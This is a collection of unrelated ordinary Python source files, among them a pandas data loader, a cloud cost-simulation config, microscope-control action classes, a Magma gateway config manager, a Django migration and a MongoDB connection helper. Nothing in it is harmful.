return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_target_normalized_meter.pkl")
if data_name == "test_nn_target_normalized_meter":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_target_normalized_meter.pkl")
if data_name == "nn_target_normalized_meter":
return load_data("train_nn_target_normalized_meter"), load_data("test_nn_target_normalized_meter")
# nn site
if data_name == "train_nn_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_site.pkl")
if data_name == "test_nn_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_site.pkl")
if data_name == "nn_site":
return load_data("train_nn_site"), load_data("test_nn_site")
# nn target normalized site
if data_name == "train_nn_target_normalized_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_target_normalized_site.pkl")
if data_name == "test_nn_target_normalized_site":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_target_normalized_site.pkl")
if data_name == "nn_target_normalized_site":
return load_data("train_nn_target_normalized_site"), load_data("test_nn_target_normalized_site")
# debug 1000
if data_name == "train_clean_debug_1000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_clean_debug_1000.pkl")
if data_name == "test_clean_debug_1000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_clean_debug_1000.pkl")
if data_name == "clean_debug_1000":
return load_data("train_clean_debug_1000"), load_data("test_clean_debug_1000")
if data_name == "leak_debug_1000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/leak_debug_1000.pkl")
# debug 10000
if data_name == "train_clean_debug_10000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_clean_debug_10000.pkl")
if data_name == "test_clean_debug_10000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_clean_debug_10000.pkl")
if data_name == "clean_debug_10000":
return load_data("train_clean_debug_10000"), load_data("test_clean_debug_10000")
if data_name == "leak_debug_10000":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/leak_debug_10000.pkl")
# raw weather
if data_name == "train_weather":
return pd.read_csv(f"{DATA_PATH}/weather_train.csv")
if data_name == "test_weather":
return pd.read_csv(f"{DATA_PATH}/weather_test.csv")
if data_name == "weather":
return load_data("train_weather"), load_data("test_weather")
# leak
if data_name == "leak":
return pd.read_feather(f"{DATA_PATH}/leak.feather")
# leak
if data_name == "is_leak":
return pd.read_feather(f"{DATA_PATH}/is_leak.feather")
# rows to drop
if data_name == "bad_meter_readings":
return pd.read_csv(f"{DATA_PATH}/bad_meter_readings.csv")
# meta
if data_name == "meta":
return pd.read_csv(f"{DATA_PATH}/building_metadata.csv")
# submissions
if data_name == "sample_submission":
return pd.read_csv(f"{DATA_PATH}/sample_submission.csv")
# meta
if data_name == "best_submission":
return pd.read_csv(f"{DATA_PATH}/submissions/final_average_top4.csv")
|
nilq/baby-python
|
python
|
"""
Configurations for Reserved Virtual Machines simulations:
"""
###################################
### Don't touch this line - import
import numpy
###################################
################################################
### General configurations, for all simualtions
START_TIME = 0 # Seconds - NOT IMPLEMENTED -> To simulate starting the experiment at a specific hour
SIMULATION_TIME = 86400 # Total simulation time (in seconds)
#AVERAGE_SERVICE_TIME = 0.008
AVERAGE_SERVICE_TIME = 0.3
#MAX_AVERAGE_LATENCY = 0.33 #Expected response time for the request from client's perspective (in seconds)
MAX_AVERAGE_LATENCY = 60
#####SYNTHETIC RATE FOR EXPERIMENTS
#ARRIVAL_RATE = numpy.array([
#4,5,6,5,4,3,2,1.6,1.4,1.3,1.2,1.1,1,1,1.1,1.1,1.2,1.4,1.6,1.7,1.8,1.9,2,3
#])
#### REAL REQUEST RATE FROM DATIL
ARRIVAL_RATE = numpy.array([
4.745364, 6.063600, 7.923774, 10.608352, 14.594335, 20.014631, 26.161790, 28.412080, 30.432822, 30.187835,
20.620131, 12.936782, 5.346152, 1.807029, 2.229556, 3.186768, 3.543904, 4.126800,
4.330005, 3.319482, 3.371923, 3.806141, 3.396690, 4.052290
])
################################################
### Configurations for Reserved VMs simulations
MAX_CONCURRENT_REQUESTS_PER_VM = 2
VM_HOURLY_COST_RESERVED = 0.034 #Per VM hourly cost in USD
################################################
### Configurations for On-demand VMs simulations
MAX_CONCURRENT_REQUESTS_PER_VM = 2
VM_HOURLY_COST_ONDEMAND = 0.047 #Per VM hourly cost in USD
################################################
### Configurations for Serverless simulations
TIME_TO_SETUP_FUNCTION = 1.4
COST_PER_REQUEST = 0.0000002
FUNCTION_MEMORY = 128 #Compression function requires 15MB, but the minimal for billing is 128MB
COST_PER_EXECUTION = 0.00001667 #Compression function requires 0.008 secs, but usage is rounded to nearest 100m for billing.
|
nilq/baby-python
|
python
|
#!/usr/bin/python
#
## @file
#
# Collection of classes that control the establish the basic operation of dave
# as it issues various types of commands to HAL and Kilroy
#
# Jeff 3/14
#
# Hazen 09/14
#
from xml.etree import ElementTree
from PyQt4 import QtCore
import sc_library.tcpMessage as tcpMessage
## addField
#
# @param block A ElementTree node.
# @param name The name of the field as a string.
# @param value The value of the field.
#
def addField(block, name, value):
field = ElementTree.SubElement(block, name)
field.set("type", str(type(value).__name__))
field.text = str(value)
## DaveAction
#
# The base class for a dave action (DA for short).
#
class DaveAction(QtCore.QObject):
# Define custom signal
complete_signal = QtCore.pyqtSignal(object)
error_signal = QtCore.pyqtSignal(object)
## __init__
#
# Default initialization.
#
def __init__(self):
# Initialize parent class
QtCore.QObject.__init__(self, None)
self.action_type = "NA"
self.disk_usage = 0
self.duration = 0
self.tcp_client = None
self.message = None
self.valid = True
# Define pause behaviors
self.should_pause = False # Pause after completion
self.should_pause_after_error = True # Pause after error
# Initialize internal timer
self.lost_message_timer = QtCore.QTimer(self)
self.lost_message_timer.setSingleShot(True)
self.lost_message_timer.timeout.connect(self.handleTimerDone)
self.lost_message_delay = 2000 # Wait for a test message to be returned before issuing an error
## abort
#
# Handle an external abort call
#
def abort(self):
self.completeAction(self.message)
## cleanUp
#
# Handle clean up of the action
#
def cleanUp(self):
self.tcp_client.messageReceived.disconnect()
## createETree
#
# Takes a dictionary that may (or may not) contain the information that is
# is necessary to create the Action. If the information is not present then
# None is returned. If the information is present then a ElementTree is
# is returned containing the information necessary to create the Action.
#
# @param dict A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
pass
## completeAction
#
# Handle the completion of an action
#
# @param message A TCP message object
#
def completeAction(self, message):
if message.isTest():
time = message.getResponse("duration")
if time is not None: self.duration = time
space = message.getResponse("disk_usage")
if space is not None: self.disk_usage = space
self.complete_signal.emit(message)
## completeActionWithError
#
# Send an error message if needed
#
# @param message A TCP message object
#
def completeActionWithError(self, message):
if (self.should_pause_after_error == True):
self.should_pause = True
self.error_signal.emit(message)
## getActionType
#
# @return The type of the action (i.e. "hal", "kilroy", ..)
#
def getActionType(self):
return self.action_type
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return type(self).__name__[2:]
## getDuration
#
# @return Duration (in seconds?)
#
def getDuration(self):
return self.duration
## getLongDescriptor
#
# @return A N x 2 array containing the message data.
#
def getLongDescriptor(self):
if self.message is not None:
mdict = self.message.getMessageData()
data = []
for key in sorted(mdict):
data.append([key, mdict[key]])
return data
else:
return [None,None]
## getUsage
#
# @return Disk usage.
#
def getUsage(self):
return self.disk_usage
## handleReply
#
# handle the return of a message
#
# @param message A TCP message object
#
def handleReply(self, message):
# Stop lost message timer
self.lost_message_timer.stop()
# Check to see if the same message got returned
if not (message.getID() == self.message.getID()):
message.setError(True, "Communication Error: Incorrect Message Returned")
self.completeActionWithError(message)
elif message.hasError():
self.completeActionWithError(message)
else: # Correct message and no error
self.completeAction(message)
## handleTimerDone
#
# Handle a timer done signal
#
def handleTimerDone(self):
error_str = "A message of type " + self.message.getType() + " was never received.\n"
error_str += "Perhaps a module is missing?"
self.message.setError(True, error_str)
self.completeActionWithError(self.message)
## isValid
#
# @return True/False is the command is valid.
#
def isValid(self):
return self.valid
## setProperty
#
# Set object property, throw an error if the property is not recognized.
#
def setProperty(self, pname, pvalue):
if pname in self.properties.keys():
self.properties[pname] = pvalue
else:
raise Exception(pname + " is not a valid property for " + str(type(self)))
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
pass
## setValid
#
# @param is_valid True/False is this message is valid.
#
def setValid(self, is_valid):
self.valid = is_valid
## shouldPause
#
# Determine if the command engine should pause after this action
#
# @return A boolean determining if the program pauses after this action is complete
def shouldPause(self):
return self.should_pause
## start
#
# Start the action.
#
# @param tcp_client The TCP client to use for communication.
# @param test_mode Send the command in test mode.
#
def start(self, tcp_client, test_mode):
self.tcp_client = tcp_client
self.message.setTestMode(test_mode)
self.tcp_client.messageReceived.connect(self.handleReply)
if self.message.isTest():
self.lost_message_timer.start(self.lost_message_delay)
self.tcp_client.sendMessage(self.message)
#
# Specific Actions
#
## DADelay
#
# This action introduces a defined delay.
#
class DADelay(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
## abort
#
# Handle an external abort call
#
def abort(self):
self.delay_timer.stop()
self.completeAction(self.message)
## cleanUp
#
# Handle clean up of the action
#
def cleanUp(self):
pass
## createETree
#
# @param dict A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
delay = dictionary.get("delay")
if delay is not None:
block = ElementTree.Element(str(type(self).__name__))
addField(block, "delay", delay)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "pause for " + str(self.delay) + "ms"
## handleTimerComplete
#
# Handle completion of the felay timer
#
def handleTimerComplete(self):
self.completeAction(self.message)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
# Prepare delay timer
self.delay_timer = QtCore.QTimer(self)
self.delay_timer.setSingleShot(True)
self.delay_timer.timeout.connect(self.handleTimerComplete)
self.delay = int(node.find("delay").text)
# Create message and add delay time for accurate dave time estimates
self.message = tcpMessage.TCPMessage(message_type = "Delay",
message_data = {"delay": self.delay});
self.message.addResponse("duration", self.delay)
## start
#
# Start the action.
#
# @param dummy Ignored.
# @param test_mode Send the command in test mode.
#
def start(self, dummy, test_mode):
self.message.setTestMode(test_mode)
if self.message.isTest():
self.completeAction(self.message)
else:
self.delay_timer.start(self.delay)
print "Delaying " + str(self.delay) + " ms"
## DAFindSum
#
# The find sum action.
#
class DAFindSum(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dict A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
find_sum = dictionary.get("find_sum")
if find_sum is None:
return
if (find_sum > 0.0):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "min_sum", find_sum)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "find sum (minimum sum = " + str(self.min_sum) + ")"
## handleReply
#
# Overload of default handleReply to allow comparison of min_sum
#
# @param message A TCP message object
#
def handleReply(self, message):
found_sum = message.getResponse("found_sum")
if not (found_sum == None) and (found_sum <= self.min_sum):
message.setError(True, "Found sum " + str(found_sum) + " is smaller than minimum sum " + str(self.min_sum))
DaveAction.handleReply(self, message)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.min_sum = float(node.find("min_sum").text)
self.message = tcpMessage.TCPMessage(message_type = "Find Sum",
message_data = {"min_sum": self.min_sum})
## DAMoveStage
#
# The move stage action.
#
class DAMoveStage(DaveAction):
## __init__
#
# @param tcp_client A tcp communications object.
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dict A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
stage_x = dictionary.get("stage_x")
stage_y = dictionary.get("stage_y")
if (stage_x is not None) and (stage_y is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "stage_x", stage_x)
addField(block, "stage_y", stage_y)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "move stage to " + str(self.stage_x) + ", " + str(self.stage_y)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.stage_x = float(node.find("stage_x").text)
self.stage_y = float(node.find("stage_y").text)
self.message = tcpMessage.TCPMessage(message_type = "Move Stage",
message_data = {"stage_x" : self.stage_x,
"stage_y" : self.stage_y})
## DAPause
#
# This action causes Dave to pause.
#
class DAPause(DaveAction):
## __init__
#
# @param tcp_client A tcp communications object.
#
def __init__(self):
DaveAction.__init__(self)
## cleanUp
#
# Handle clean up of the action
#
def cleanUp(self):
pass
## createETree
#
# @param dict A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
pause = dictionary.get("pause")
if (pause is not None):
block = ElementTree.Element(str(type(self).__name__))
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "pause"
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
# Create message and add delay time for accurate dave time estimates
self.message = tcpMessage.TCPMessage(message_type = "Pause");
# Define pause behaviors
self.should_pause = True
## start
#
# Start the action.
#
# @param dummy Ignored.
# @param test_mode Send the command in test mode.
#
def start(self, dummy, test_mode):
self.message.setTestMode(test_mode)
if self.message.isTest():
self.completeAction(self.message)
else:
self.completeAction(self.message)
## DARecenterPiezo
#
# The piezo recentering action. Note that this is only useful if the microscope
# has a motorized Z.
#
class DARecenterPiezo(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
recenter = dictionary.get("recenter")
if (recenter is not None):
block = ElementTree.Element(str(type(self).__name__))
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "recenter piezo"
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.message = tcpMessage.TCPMessage(message_type = "Recenter Piezo")
## DASetDirectory
#
# Change the Hal Directory.
#
class DASetDirectory(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
directory = dictionary.get("directory")
if (directory is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "directory", directory)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "change directory to " + self.directory
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.directory = node.find("directory").text
self.message = tcpMessage.TCPMessage(message_type = "Set Directory",
message_data = {"directory": self.directory})
## DASetFocusLockTarget
#
# The set focus lock target action.
#
class DASetFocusLockTarget(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
lock_target = dictionary.get("lock_target")
if (lock_target is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "lock_target", lock_target)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "set focus lock target to " + str(self.lock_target)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.lock_target = float(node.find("lock_target").text)
self.message = tcpMessage.TCPMessage(message_type = "Set Lock Target",
message_data = {"lock_target" : self.lock_target})
## DASetParameters
#
# The action responsible for setting the movie parameters in Hal.
#
class DASetParameters(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
parameters = dictionary.get("parameters")
if (parameters is not None):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "parameters", parameters)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "set parameters to " + str(self.parameters)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
p_node = node.find("parameters")
if (p_node.attrib["type"] == "int"):
self.parameters = int(node.find("parameters").text)
else:
self.parameters = node.find("parameters").text
self.message = tcpMessage.TCPMessage(message_type = "Set Parameters",
message_data = {"parameters" : self.parameters})
## DASetProgression
#
# The action responsible for setting the illumination progression.
#
class DASetProgression(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
progression = dictionary.get("progression")
if progression is not None:
block = ElementTree.Element(str(type(self).__name__))
for pnode in progression:
# The round trip fixes some white space issues.
block.append(ElementTree.fromstring(ElementTree.tostring(pnode)))
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "set progressions to " + self.type
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.type = node.find("type").text
message_data = {"type" : self.type}
# File progression.
if node.find("filename") is not None:
message_data["filename"] = node.find("filename").text
# Math progression.
elif node.find("channel") is not None:
channels = []
for ch_node in [x for x in node if (x.tag == "channel")]:
channel = int(ch_node.text)
start = float(ch_node.attrib["start"])
if "frames" in ch_node.attrib:
frames = int(ch_node.attrib["frames"])
else:
frames = 100
if "inc" in ch_node.attrib:
inc = float(ch_node.attrib["inc"])
else:
inc = 0.0
channels.append([channel, start, frames, inc])
message_data["channels"] = channels
self.message = tcpMessage.TCPMessage(message_type = "Set Progression",
message_data = message_data)
## DATakeMovie
#
# Send a take movie command to Hal
#
class DATakeMovie(DaveAction):
## __init__
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "hal"
self.properties = {"name" : None,
"length" : None,
"min_spots" : None,
"parameters" : None,
"directory" : None,
"overwrite" : None}
## abort
#
# Send an abort message to Hal
#
def abort(self):
stop_message = tcpMessage.TCPMessage(message_type = "Abort Movie")
self.tcp_client.sendMessage(stop_message)
## createETree
#
# @param dictionary A dictionary.
#
# @return A ElementTree object or None.
#
def createETree(self, dictionary):
name = dictionary.get("name")
length = dictionary.get("length")
min_spots = dictionary.get("min_spots")
parameters = dictionary.get("parameters")
directory = dictionary.get("directory")
overwrite = dictionary.get("overwrite")
if (name is not None) and (length is not None):
if (length > 0):
block = ElementTree.Element(str(type(self).__name__))
addField(block, "name", name)
addField(block, "length", length)
if min_spots is not None:
addField(block, "min_spots", min_spots)
if parameters is not None:
addField(block, "parameters", parameters)
if directory is not None:
addField(block, "directory", directory)
if overwrite is not None:
addField(block, "overwrite", overwrite)
return block
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
if (self.min_spots > 0):
return "take movie " + self.name + ", " + str(self.length) + " frames, " + str(self.min_spots) + " minimum spots"
else:
return "take movie " + self.name + ", " + str(self.length) + " frames"
## handleReply
#
# Overload of default handleReply to allow comparison of min_spots
#
# @param message A TCP message object
#
def handleReply(self, message):
found_spots = message.getResponse("found_spots")
if not (found_spots == None) and (found_spots < self.min_spots):
err_str = str(found_spots) + " found molecules is less than the target: "
err_str += str(self.min_spots)
message.setError(True, err_str)
DaveAction.handleReply(self,message)
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.name = node.find("name").text
self.length = int(node.find("length").text)
self.min_spots = 0
if node.find("min_spots") is not None:
self.min_spots = int(node.find("min_spots").text)
message_data = {"name" : self.name,
"length" : self.length,
"min_spots" : self.min_spots,
"parameters" : None}
if node.find("parameters") is not None:
message_data["parameters"] = node.find("parameters").text
if node.find("directory") is not None:
message_data["directory"] = node.find("directory").text
if node.find("overwrite") is not None:
message_data["overwrite"] = node.find("overwrite").text
self.message = tcpMessage.TCPMessage(message_type = "Take Movie",
message_data = message_data)
## DAValveProtocol
#
# The fluidics protocol action. Send commands to Kilroy.
#
class DAValveProtocol(DaveAction):
## __init__
#
# Initialize the valve protocol action
#
def __init__(self):
DaveAction.__init__(self)
self.action_type = "kilroy"
self.properties = {"name" : None}
## createETree
#
# Generate a Element Tree for the valve protocol specified.
#
# @param dictionary A dictionary containing the relevant data to create the element tree
#
def createETree(self, dictionary):
name = dictionary.get("name", None)
if (name is not None):
node = ElementTree.Element(str(type(self).__name__))
node.text = name
return node
else:
return None
## getDescriptor
#
# @return A string that describes the action.
#
def getDescriptor(self):
return "valve protocol " + self.protocol_name
## setup
#
# Perform post creation initialization.
#
# @param node The node of an ElementTree.
#
def setup(self, node):
self.protocol_name = node.text
self.protocol_is_running = False
self.message = tcpMessage.TCPMessage(message_type = "Kilroy Protocol",
message_data = {"name": self.protocol_name})
#
# The MIT License
#
# Copyright (c) 2014 Zhuang Lab, Harvard University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
|
nilq/baby-python
|
python
|
"""
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import asyncio
import logging
from typing import Any, List
from magma.common.service import MagmaService
from magma.common.streamer import StreamerClient
from magma.configuration.mconfig_managers import MconfigManager, \
load_service_mconfig
from magma.magmad.service_manager import ServiceManager
from orc8r.protos.mconfig import mconfigs_pb2
from orc8r.protos.mconfig_pb2 import GatewayConfigsDigest
CONFIG_STREAM_NAME = 'configs'
class ConfigManager(StreamerClient.Callback):
"""
Manager for access gateway config. Updates are received as a stream and
are guaranteed to be lossless and in-order. Config is written to file in
JSON format.
"""
def __init__(self, services: List[str], service_manager: ServiceManager,
magmad_service: MagmaService, mconfig_manager: MconfigManager,
allow_unknown_fields: bool = True, loop=None) -> None:
"""
Args:
services: List of services to manage
service_manager: ServiceManager instance
magmad_service: magmad service instance
mconfig_manager: manager class for the mconfig
allow_unknown_fields: set to True to suppress unknown field errors
loop: asyncio event loop to run in
"""
self._services = services
self._service_manager = service_manager
self._magmad_service = magmad_service
self._mconfig_manager = mconfig_manager
self._allow_unknown_fields = allow_unknown_fields
self._loop = loop or asyncio.get_event_loop()
# Load managed config
self._mconfig = self._mconfig_manager.load_mconfig()
def get_request_args(self, stream_name: str) -> Any:
# Include an mconfig digest argument to allow cloud optimization of
# not returning a non-updated mconfig.
digest = getattr(self._mconfig.metadata, 'digest', None)
if digest is None:
return None
mconfig_digest_proto = GatewayConfigsDigest(
md5_hex_digest=digest.md5_hex_digest)
return mconfig_digest_proto
def process_update(self, stream_name, updates, resync):
"""
Handle config updates. Resync is ignored since the entire config
structure is passed in every update.
Inputs:
- updates - list of GatewayConfigs protobuf structures
- resync - boolean indicating whether all database information will be
resent (hence cached data can be discarded). This is ignored
since config is contained in one DB element, hence all
data is sent in every update.
"""
if len(updates) == 0:
logging.info('No config update to process')
return
# We will only take the last update
for update in updates[:-1]:
logging.info('Ignoring config update %s', update.key)
# Deserialize and store the last config update
logging.info('Processing config update %s', updates[-1].key)
mconfig_str = updates[-1].value.decode()
mconfig = self._mconfig_manager.deserialize_mconfig(
mconfig_str,
self._allow_unknown_fields,
)
if 'magmad' not in mconfig.configs_by_key:
logging.error('Invalid config! Magmad service config missing')
return
self._mconfig_manager.update_stored_mconfig(mconfig_str)
self._magmad_service.reload_mconfig()
def did_mconfig_change(serv_name):
return mconfig.configs_by_key.get(serv_name) != \
self._mconfig.configs_by_key.get(serv_name)
# Reload magmad configs locally
if did_mconfig_change('magmad'):
self._loop.create_task(
self._service_manager.update_dynamic_services(
load_service_mconfig('magmad', mconfigs_pb2.MagmaD())
.dynamic_services,
)
)
services_to_restart = [
srv for srv in self._services if did_mconfig_change(srv)
]
if services_to_restart:
self._loop.create_task(
self._service_manager.restart_services(services_to_restart),
)
self._mconfig = mconfig
|
nilq/baby-python
|
python
|
# Not used
# Author : Satish Palaniappan
__author__ = "Satish Palaniappan"
import os, sys, inspect
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
from twokenize import *
import re
Code = r"\\[a-zA-Z0-9]+"
List = [
Url_RE,
Timelike,
Code
]
# stoplist = [")","(",".","'",",",";",":","?","/","!","@","$","*","+","-","_","=","&","%","`","~","\"","{","}"]
stopwords = [s.strip() for s in open(cmd_folder + "/stopwords","r").readlines()]
# print(stopwords)
### Not Implemented
def prep (text):
line = text
line = re.sub(r"[@#]", '', line)
for r in List:
line = re.sub(r," ", line)
for w in stopwords:
line = line.replace(" " + w.strip() + " "," ")
return line
def process(text):
# text = prep(text.strip().lower())
text = text.strip().lower()
text = u" ".join(tokenize(text))
return text.encode("utf-8")
|
nilq/baby-python
|
python
|
import json
import cv2.aruco as aruco
import numpy as np
with open("config.json", "r") as json_file:
data = json.load(json_file)
arucoDictionary = aruco.Dictionary_get(data["arucoDictionary"])
timeStep = data["timeStep"]
isLogEnabled = bool(data["logEnabled"])
markerWidth = data["markerWidth"]
camera = int(data["camera"])
actuators = data["actuators"]
gameDuration = data["gameDuration"]
device = data["device"]
minDistance = data["minDistance"]
maxDistance = data["maxDistance"]
frequencyClose = data["frequencyClose"]
frequencyOptimal = data["frequencyOptimal"]
frequencyFar = data["frequencyFar"]
actuatorRanges = data["actuatorRanges"]
targetLookAtThreshold = data["targetLookAtThreshold"]
dangerTime = data["dangerTime"]
shoulderMotors = data["shoulderMotors"]
motorInterval = data["motorInterval"]
resolutionX = data["resolutionX"]
resolutionY = data["resolutionY"]
distortCoeffs = np.array(data["distortCoeffs"])
focalLength = data["focalLength"]
camMatrix = np.array(data["camMatrix"])
camCenter = data["camCenter"]
calibrate = data["calibrate"]
useFisheye = data["useFisheye"]
deviceMode = int(data["deviceMode"])
usbPort = data["usbPort"]
catchThiefAfterTime = data["catchThiefAfterTime"]
buttonGpioPort= int(data["button_gpio_pin"])
def get_marker_id(side):
return data["markers"][side]
|
nilq/baby-python
|
python
|
import unittest
import younit
# @unittest.skip("skipped")
class CommonTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
async def async_setUp(self):
pass
async def async_tearDown(self):
pass
def setUp(self):
pass
def tearDown(self):
pass
def GIVEN_this(self):
pass
def WHEN_that(self):
pass
def THEN_verify(self):
pass
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import os
import pathlib
from .Decorators import Decorators
from ...Exceptions import AsyncyError
def safe_path(story, path):
"""
safe_path resolves a path completely (../../a/../b) completely
and returns an absolute path which can be used safely by prepending
the story's tmp dir. This ensures that the story cannot abuse the system
and write elsewhere, for example, stories.json.
:param story: The story (Stories object)
:param path: A path to be resolved
:return: The absolute path, which can be used to read/write directly
"""
story.create_tmp_dir()
# Adding the leading "/" is important, otherwise the current working
# directory will be used as the base path.
path = f'/{path}'
path = pathlib.Path(path).resolve()
return f'{story.get_tmp_dir()}{os.fspath(path)}'
@Decorators.create_service(name='file', command='write', arguments={
'path': {'type': 'string'},
'content': {'type': 'any'}
})
async def file_write(story, line, resolved_args):
path = safe_path(story, resolved_args['path'])
try:
with open(path, 'w') as f:
f.write(resolved_args['content'])
except IOError as e:
raise AsyncyError(message=f'Failed to write to file: {e}',
story=story, line=line)
@Decorators.create_service(name='file', command='read', arguments={
'path': {'type': 'string'}
}, output_type='string')
async def file_read(story, line, resolved_args):
path = safe_path(story, resolved_args['path'])
try:
with open(path, 'r') as f:
return f.read()
except IOError as e:
raise AsyncyError(message=f'Failed to read file: {e}',
story=story, line=line)
@Decorators.create_service(name='file', command='exists', arguments={
'path': {'type': 'string'}
}, output_type='boolean')
async def file_exists(story, line, resolved_args):
path = safe_path(story, resolved_args['path'])
return os.path.exists(path)
def init():
pass
|
nilq/baby-python
|
python
|
# Generated by Django 3.1.2 on 2020-10-30 18:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('catalog', '0002_auto_20201030_1417'),
]
operations = [
migrations.RemoveField(
model_name='book',
name='language',
),
migrations.AddField(
model_name='book',
name='language',
field=models.ForeignKey(help_text='Select the language the book is written in.', null=True, on_delete=django.db.models.deletion.SET_NULL, to='catalog.language'),
),
]
|
nilq/baby-python
|
python
|
import logging
from application.utils import globals
from application.utils.helpers import Singleton
from pymongo import MongoClient, ASCENDING, DESCENDING
@Singleton
class Connection:
_client = None
db = None
def __init__(self):
try:
self._client = MongoClient(globals.configuration.mongo['uri'])
self.db = self._client[globals.configuration.mongo['db']]
self.generate_structure()
except Exception, error:
logging.error('DB error: %s' % error.message)
raise error
def generate_structure(self):
"""
Create indexes
:return:
"""
try:
self.db.twitter.ensure_index([('created', DESCENDING)], name='_date_index1', background=True)
self.db.twitter.ensure_index([('source', ASCENDING)], name='_source_index1', background=True)
self.db.twitter.ensure_index([('hashtags', ASCENDING)], name='_hashtags_index1', background=True)
self.db.twitter.ensure_index([('user', ASCENDING)], name='_user_index1', background=True)
except Exception, error:
logging.error('Error during index creation: %s' % error.message)
raise error
|
